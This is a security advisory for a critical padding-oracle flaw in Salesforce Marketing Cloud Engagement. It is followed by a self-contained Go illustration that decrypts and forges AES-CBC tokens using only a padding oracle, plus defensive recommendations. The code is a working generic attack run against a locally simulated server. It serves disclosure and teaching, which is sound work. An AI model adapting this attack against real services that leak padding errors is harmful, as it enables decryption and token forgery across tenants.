PT-2026-4542 · Salesforce · Salesforce Marketing Cloud Engagement

s.shah@slcyber.io

Published: 2026-01-24 · Updated: 2026-05-09

CVE-2026-22585

CVSS v3.1: 9.8 Critical

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Salesforce Marketing Cloud Engagement versions prior to January 21st, 2026
Description: Use of a broken or risky cryptographic algorithm in the CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, and View As Webpage modules allows for Web Services Protocol Manipulation. The weakness is a padding oracle: the server decrypts attacker-supplied ciphertext and responds differently when the padding is invalid, and that one-bit difference per request is enough to decrypt, and by the same mechanism forge, ciphertext without ever learning the key. Because the AES key is static and shared across every tenant, a ciphertext decrypted or forged this way is valid against any tenant, not only the attacker's own. Combined with AMPScript injection in subject lines, this can be used to read data belonging to other users, including emails.
Recommendations: Update to the version released on or after January 21st, 2026.
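The following program is an added illustration of the attack class described above; it is not code from the advisory, from the reporter, or from Salesforce, and it makes no claim about how Marketing Cloud Engagement implements its tokens. It assumes AES-CBC with PKCS#7 padding (the advisory names AES and a padding oracle, which implies a padded mode), a constructed 32-byte key that stands in for the static cross-tenant key, and a fixed IV so the run is deterministic. Go is used because its standard library provides AES-CBC without third-party packages. The attacker-side functions `recoverIntermediate`, `recoverPlaintext` and `forgeCiphertext` touch the key only through `paddingOracle`, the one bit of information the server leaks.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

const bs = aes.BlockSize

// sharedKey plays the role of the static AES key the advisory says every tenant
// shares. It is a constructed value for this example, not a product secret.
var sharedKey = []byte("0123456789abcdef0123456789abcdef")

// pad / unpad implement PKCS#7 (assumed here; the advisory does not name the scheme).
func pad(b []byte) []byte {
	n := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > bs || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// encrypt is the server side: AES-CBC under the shared key, output is IV||ciphertext.
// The fixed IV keeps the example deterministic; a real service must use a random one.
func encrypt(plain []byte) []byte {
	block, _ := aes.NewCipher(sharedKey)
	iv := bytes.Repeat([]byte{0x42}, bs)
	padded := pad(plain)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(iv, ct...)
}

// decrypt is the server side for attacker-supplied tokens.
func decrypt(ivct []byte) ([]byte, error) {
	if len(ivct) < 2*bs || len(ivct)%bs != 0 {
		return nil, errors.New("bad length")
	}
	block, _ := aes.NewCipher(sharedKey)
	pt := make([]byte, len(ivct)-bs)
	cipher.NewCBCDecrypter(block, ivct[:bs]).CryptBlocks(pt, ivct[bs:])
	return unpad(pt)
}

// paddingOracle is the leak: a distinguishable error when padding is invalid.
// The attacker sees one bit per query and never a byte of plaintext or key.
func paddingOracle(ivct []byte) bool {
	_, err := decrypt(ivct)
	return err == nil
}

// recoverIntermediate learns D_K(target) byte by byte from the oracle alone.
func recoverIntermediate(target []byte, oracle func([]byte) bool) []byte {
	inter := make([]byte, bs)
	crafted := make([]byte, bs)
	for pos := bs - 1; pos >= 0; pos-- {
		want := byte(bs - pos) // padding value we are forcing at positions pos..15
		for i := pos + 1; i < bs; i++ {
			crafted[i] = inter[i] ^ want
		}
		for g := 0; g < 256; g++ {
			crafted[pos] = byte(g)
			probe := append(append([]byte{}, crafted...), target...)
			if !oracle(probe) {
				continue
			}
			if pos == bs-1 { // rule out an accidental 02 02 (or longer) padding
				probe[pos-1] ^= 0xff
				if !oracle(probe) {
					continue
				}
			}
			inter[pos] = byte(g) ^ want
			break
		}
	}
	return inter
}

// recoverPlaintext decrypts IV||ciphertext with no key: P_i = D_K(C_i) XOR C_{i-1}.
func recoverPlaintext(ivct []byte, oracle func([]byte) bool) []byte {
	var out []byte
	for i := bs; i < len(ivct); i += bs {
		inter := recoverIntermediate(ivct[i:i+bs], oracle)
		for j, b := range inter {
			out = append(out, b^ivct[i-bs+j])
		}
	}
	pt, _ := unpad(out)
	return pt
}

// forgeCiphertext builds IV||ciphertext for chosen plaintext, working backwards:
// pick C_n freely, learn D_K(C_n), set C_{n-1} = D_K(C_n) XOR P_n, and repeat.
// Under a key shared across tenants, the result is accepted for every tenant.
func forgeCiphertext(plain []byte, oracle func([]byte) bool) []byte {
	padded := pad(plain)
	n := len(padded) / bs
	out := make([]byte, (n+1)*bs) // block 0 becomes the IV; block n stays all-zero
	for i := n; i >= 1; i-- {
		inter := recoverIntermediate(out[i*bs:(i+1)*bs], oracle)
		for j := range inter {
			out[(i-1)*bs+j] = inter[j] ^ padded[(i-1)*bs+j]
		}
	}
	return out
}

func main() {
	ct := encrypt([]byte("tenant=acme;subject=Q1 results")) // constructed sample token
	fmt.Printf("recovered without key: %q\n", recoverPlaintext(ct, paddingOracle))
	forged := forgeCiphertext([]byte("tenant=other;subject=forged"), paddingOracle)
	pt, err := decrypt(forged)
	fmt.Printf("server decrypts forged token to %q (err=%v)\n", pt, err)
}
```

Each byte costs at most 256 oracle queries, so a 16-byte block falls in a few thousand requests, and the forgery direction is what turns a decryption leak into the protocol manipulation the advisory describes. The defensive lesson is the one the fix embodies: per-tenant keys, an authenticated mode (AES-GCM or encrypt-then-MAC) so tampered ciphertext is rejected before any padding check, and error responses that do not distinguish padding failures from other failures.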

Fix

Weakness Enumeration

Use of a Broken Cryptographic Algorithm

Related Identifiers

CVE-2026-22585

Affected Products

Salesforce Marketing Cloud Engagement